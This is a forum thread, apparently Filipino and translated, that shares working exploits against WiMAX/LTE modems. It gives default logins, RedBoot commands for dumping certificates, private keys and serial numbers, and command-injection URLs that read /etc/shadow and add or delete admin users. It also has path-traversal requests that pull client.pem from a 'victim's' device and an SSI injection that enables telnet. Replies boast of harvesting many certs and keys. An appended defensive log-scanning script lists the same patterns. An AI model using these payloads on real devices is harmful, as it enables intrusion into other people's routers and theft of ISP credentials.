Symbianize Forum


BAGSAKAN 2015 ! - cr4mfs sy

Status
Not open for further replies.

cr4mfs sy

====================================================
COMPLETE REDBOOT COMMAND
====================================================

BEFORE ANYTHING ELSE, I WANT TO SAY THAT I DID NOT LEECH THIS FROM ANYONE. I WILL SHOW HERE THE PROCESS BY WHICH I OBTAINED THE REDBOOT COMMANDS. HERE'S THE PROOF.

1. USE THE CERT-WRITER.EXE AND SNWRITER.EXE TOOLS FROM THE BM622M.

2. DOWNLOAD WIRESHARK

3. NOW CLOSE ALL BROWSERS AND RUNNING APPLICATIONS SO THAT WIRESHARK DOES NOT PICK THEM UP.

4. OPEN CERT-WRITER.EXE OR SNWRITER.EXE. THEN OPEN WIRESHARK.

5. IN WIRESHARK, CHOOSE THE LAN INTERFACE, THEN CLICK START. OPEN CERT-WRITER.EXE, THEN CLICK CONNECT,
THEN UPLOAD A CERTIFICATE AND PRIVATE KEY. THIS IS SO THAT WIRESHARK SHOWS HOW THE PEM AND KEY ARE WRITTEN.

6. AFTER THE PEM AND KEY ARE UPLOADED, CLICK VERIFY SO THAT THE PEM AND KEY ARE DUMPED AND SHOW UP IN WIRESHARK.

7. GO TO WIRESHARK AND LOOK FOR 192.168.15.1 THERE.
IMAGE:
View attachment 219835

8. RIGHT-CLICK 192.168.15.1, THEN CHOOSE "FOLLOW TCP STREAM". YOU WILL SEE THAT IT RECORDED THE REDBOOT COMMANDS AND OUTPUT. YOU CAN ALSO SAVE IT.

IMAGE:
View attachment 219838


"FOR EVERYONE'S INFORMATION, THE FORMAT FOR EXTRACTING THE PEM AND KEY DIFFERS BETWEEN WI-TRIBE AND SMART."

SMART DUMP PEM AND KEY

OPEN CMD
TYPE 192.168.15.1
LOGIN: mt7109
password: wimax

Code:
#nc 169.254.71.8 9000
<PRESS ENTER>
RedBoot>rfcal -act 48 -arg1 0 -arg2 4096
RedBoot>rfcal -act 49 -arg1 0
4084 
RedBoot>read cert_file 4084 0
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
RedBoot>rfcal -act 48 -arg1 1 -arg2 1712
RedBoot>rfcal -act 49 -arg1 1 
1712 
RedBoot>read cert_file 1712 0
-----BEGIN RSA PRIVATE----- 
-----END RSA PRIVATE KEY-----


WI-TRIBE DUMP PEM AND KEY

OPEN CMD
TYPE 192.168.15.1
LOGIN: mt7109
password: wimax

Code:
#nc 169.254.71.8 9000
<PRESS ENTER>
RedBoot> 
rfcal -act 48 -arg1 0 -arg2 1184
RedBoot> 
rfcal -act 49 -arg1 0 
1183 
RedBoot> 
read cert_file 1183 0
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
RedBoot> 
rfcal -act 48 -arg1 1 -arg2 896

RedBoot> 
rfcal -act 49 -arg1 1 
896 
RedBoot> 
read cert_file 896 0
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----

CHANGE SERIAL NUMBER

Code:
RedBoot> rfcal -act 25
RedBoot> read serialno 128 0
DVTKC133200799
RedBoot>write serialno 128 0
g 1212211123456gtk


ALL OF THIS HAS A BASIS. NORMALLY YOU CAN REACH REDBOOT ON PORT 9000 ONLY. THIS CAN ONLY BE DONE OVER A LAN CONNECTION. THAT HAS BEEN WELL KNOWN TO US FOR A LONG TIME.

Code:
EXAMPLE: 
telnet 192.168.15.1 9000

redboot>


AS FOR REACHING REDBOOT FROM INSIDE TELNET, WHICH CAN BE DONE OVER BOTH WAN AND LAN, I HAVE A BASIS FOR HOW I OBTAINED IT, AND I DID NOT LEECH IT FROM ANYONE.

THE LOGIC CAN BE FOUND INSIDE THE /init.d/boot_update File Directory.

View attachment 219839


================================================
OD235 / OD35 BACK DOOR COMMAND AND TRICK
================================================

Code:
BROWSER BACK DOOR OD235
OPEN THE FIRST TAB, THEN PASTE THIS; IT WILL THEN SAY SUCCESSFULLY
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=1+%26+cat+/etc/shadow

OPEN A NEW TAB
PASTE THIS COMMAND LINK. THE RESULT WILL APPEAR THERE.
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1
REPLACE /etc/shadow DEPENDING ON WHAT YOU WANT TO SEE.

CHANGE ADMIN LOGIN ON OD235 ONLY !! USER LOGIN ONLY / BLANK PASSWORD

Code:
OPEN THE FIRST TAB, THEN PASTE THIS; IT WILL THEN SAY SUCCESSFULLY
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=1+%26+deluser Superuser

OPEN A NEW TAB
PASTE THIS COMMAND LINK. THE RESULT WILL APPEAR THERE.
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1

CHANGE ADMIN LOGIN ON OD235 ONLY !!
OPEN THE FIRST TAB, THEN PASTE THIS; IT WILL THEN SAY SUCCESSFULLY
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=1+%26+adduser CRAMFS

OPEN A NEW TAB
PASTE THIS COMMAND LINK. THE RESULT WILL APPEAR THERE.
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start&notrun=1

DIRECTORY LIST

/etc/passwd
/etc/shadow
/mnt/jffs2/conf/user/supplicant.conf
/mnt/jffs2/conf/user/ltesetting.conf
/mnt/jffs2/conf/user/ui.conf
/mnt/jffs2/conf/iser/wmxsetting.conf
/mnt/jffs2/conf/user/sysini.conf

HIDDEN COMMANDS

cmscfg --help
-s SET
-g GET
-r REPLACE
-v VALUE
-n PARAM

SAMPLE COMMAND:

telnetd enable

cmscfg -s -n sys_telnetd -v enable

ftpd enable

cmscfg -s -n sys_ftpd -v enable

TFTP COMMAND

must have tftpd32.exe, set-up your ip to 192.168.15.2 and tftpboot directory

~#cd /mnt/jffs2/conf/user/
~#tftp -g -r /mnt/jffs2/conf/user/sysini.conf 192.168.15.2 sysini.conf---> get file

~#cd /mnt/jffs2/etc/
~#tftp -p -r shadow 192.168.15.2 shadow ---> put file

OPEN TELNET FOR BOTH WITRIBE LIBERTY AND OD235 or OD350

the command is;
Code:
fw_setenv factory 1   ----> to enable telnet , but disabled http

fw_setenv factory 0   -----> to enable http , but disabled telnet

DISCLAIMER:
I TAKE NO RESPONSIBILITY FOR WHATEVER HAPPENS TO YOUR DEVICE. STRICTLY FOR EDUCATIONAL PURPOSES ONLY.
I TAKE NO RESPONSIBILITY IF THIS IS USED ILLEGALLY. USE IT AT YOUR OWN RISK



ENJOY :)

CR4MFS SY




Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

:excited::excited::excited: so the true master is back :excited::excited::excited: thank you very much, sir :praise::praise::praise:
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

thanks for the share, but the password won't work.. I wonder why..
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

LIBERTY WIXB-175x204 PEMKEY GRABBING

STEP # 1

In the Mozilla browser, open the victim's IP. LOGIN using these possible credentials

witribe
witribe123
witribe12345

STEP # 2

Press the CTRL + SHIFT key. Click the Debugger tab. On the left side you will see sysconf.cgi. Hover your CURSOR over sysconf.cgi so that you can see the URL
and the SID appears. As for the timestamp, the default timestamp that appears in your address bar is enough.

View attachment 1040555

STEP # 3

Open a NEW TAB > Copy and paste this exploit. Fill in the appropriate IP address, SID and TIMESTAMP,
then press ENTER and the magical PEMKEY will appear.

SAMPLE EXPLOIT:


EXPLOIT:
https://ip address:8080/cgi-bin/sysconf.cgi?page=../../tmp/var/client.pem&action=request&sid=put the sid here&timestamp=put the timestamp here

View attachment 1040557


OPTIONAL:
FOR THOSE WHO KNOW HOW TO USE TAMPER DATA, IT IS EASIER THIS WAY.

1. LOG IN TO THE VICTIM'S GUI.

2. Go to the Personalize tab > Device Name. Enter FOO as the New Device Name. Do not click APPLY yet.

3. Open Tamper Data, then click START, then click APPLY.

4. Uncheck Continue Tampering. Then click Tamper.

5. Then click OK

View attachment 1040562


6. Look for the GET, right-click it and choose Replay Browser

View attachment 1040560

7. This is what should appear after you choose Replay Browser. You will see Personalize_password there. Replace it with ../../tmp/var/client.pem, then click Okay. It will then open a New Tab and the Pemkey will appear there.

View attachment 1040565


=======================================================================
BACKDOOR COMMANDS
=======================================================================

Tamper Data Method:

1. Just follow the Tamper Data method via Device Name.

2. Change name to FOO

3. Start Tamper Data. Change FOO to <!--#exec cmd="cmscfg -s -n sys_telnetd -v enable"-->

4. Click OK.

5. Again look for the GET > right-click, then choose Replay Browser. Personalize_password will appear there; replace it with ../../etc/hosts, then click OK

6. TELNET IS NOW ENABLED


DISCLAIMER:
For Educational Purposes Only. I am not liable for any illegal acts that may be caused by using this.
Thank you


GM/cr4mfs_sy

there it is :happy:

thanks, Tito Makoy :D you really are the one hahahaha :D
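
Added example (not part of the thread, not the vendor's code): a log check a defender could run for the three request patterns posted above, the `mon_diag_addr` command injection, the `page=../../` file read and the `<!--#exec` device-name injection. The access-log format, the `device_name` parameter name and the function names are assumptions; the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (common log format is an assumption;
# "device_name" is a hypothetical parameter name, not taken from the thread).
SAMPLE_LOG = """\
192.168.254.10 - - [22/Jun/2015:21:11:21 +0800] "GET /cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=192.168.254.1 HTTP/1.1" 200 31
192.168.254.10 - - [22/Jun/2015:21:13:51 +0800] "GET /cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=1+%26+cat+/etc/shadow HTTP/1.1" 200 31
203.0.113.7 - - [22/Jun/2015:22:31:35 +0800] "GET /cgi-bin/sysconf.cgi?page=../../tmp/var/client.pem&action=request&sid=CONSTRUCTED&timestamp=0 HTTP/1.1" 200 2896
203.0.113.7 - - [22/Jun/2015:22:32:11 +0800] "GET /cgi-bin/sysconf.cgi?page=ajax.asp&action=request&device_name=%3C%21--%23exec+cmd%3D%22id%22--%3E HTTP/1.1" 200 40
"""

REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')
HOST_OR_IP = re.compile(r"^[A-Za-z0-9.:-]{1,253}$")  # all a ping target may contain


def classify(url):
    """Return the list of findings for one request URL to sysconf.cgi."""
    parts = urlsplit(url)
    if not parts.path.endswith("/sysconf.cgi"):
        return []
    findings = []
    params = parse_qs(parts.query, keep_blank_values=True)
    for name, values in params.items():
        for raw in values:
            value = unquote(raw)  # second decode catches double-encoded input
            if name == "page" and (".." in value or value.startswith("/")):
                findings.append("path-traversal")
            if name == "mon_diag_addr" and not HOST_OR_IP.match(value):
                findings.append("command-injection")
            if "<!--#" in value:
                findings.append("ssi-injection")
    return findings


def scan(log_text):
    """Return (client, finding) pairs for every suspicious log line."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if m:
            hits.extend((m.group(1), f) for f in classify(m.group(2)))
    return hits


if __name__ == "__main__":
    for client, finding in scan(SAMPLE_LOG):
        print(client, finding)
```

The same allowlist logic (plain file name for `page`, host or IP only for `mon_diag_addr`) is what the CGI itself would need to enforce server-side; the log check only finds requests after the fact.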
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

It came out for me too ^^ Thanks Master !
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

hahaha you made up for it, huh :D
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

This is what I can make use of !!
There is a lot more that can be done with this.
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

Ouch, another blast :)
One bombshell after another, I wonder what's next :lol:
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

thanks for this, master....!! so that I can study it first
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

tribe is going to get ravaged again by this :excited:

most likely this will really end up 1 is to 1 hehe, there are so many to scan that you'll be the one to get tired of it :D

just don't break the ones you open hehe, since the backdoor for telnet was also shared :)

truly an idol :D
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

Looks like the bombshells are coming one after another !!
I've already gotten a lot of certs and keys. Thanks T.S.
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

drop the fix too, even when all ports are closed hahaha
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

Thanks TS, I've also gotten a lot of certs and keys

But I think my format is wrong

Save as all files

Then

2010xxxxxx pem.pem > cert
2010xxxxxx pem.key > key

On upload it says invalid. What is the correct format for that, TS?

Correct me if I'm wrong?
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

all up......todo pung....bisaklat ! thanks master galaxyman .:excited:
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

master ??..there is only one above all, Nathalia, XEla..haha..ORIGINAL!
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

only alex is the master, not cramfs. most of what cramfs knows he just leeched from his buddies, including the redboot he is so proud of. the truth is that before cramfs ever learned the pem key dump on tribu, natalia had already known it for a long time. in short, cramfs courted the command, but alex aka natalia gazanova is clever, so what was given was a dump that sometimes fails, which scammer king immediately bragged about and made money from. the story of why alex is pissed at him runs deep. so for me that cramfs is a leecher too..don't fool yourself cramfs, you know what I'm saying is true hahahahaha:lol::rofl::lol: maybe you'll say again that we envy you??? there is nothing I should envy you for
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

hello mr sy, thnx for the share :) just ignore those who bash you. as the saying goes, "You can't please everyone", so just focus on those who admire you :). Thnx again for sharing; all I can say is that I learned a lot from what you shared and everything is 100% working :)

View attachment 219793
 

Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

thanks ...keep on sharing
 
Re: LIBERTY WIXB-175x204 PEMKEY GRABBING

why is it like this, you're all fighting again :( :( one thread got deleted because of it :weep::weep: that one was useful too and the tut was ok too :( :( I wonder why it was deleted :noidea::noidea:
 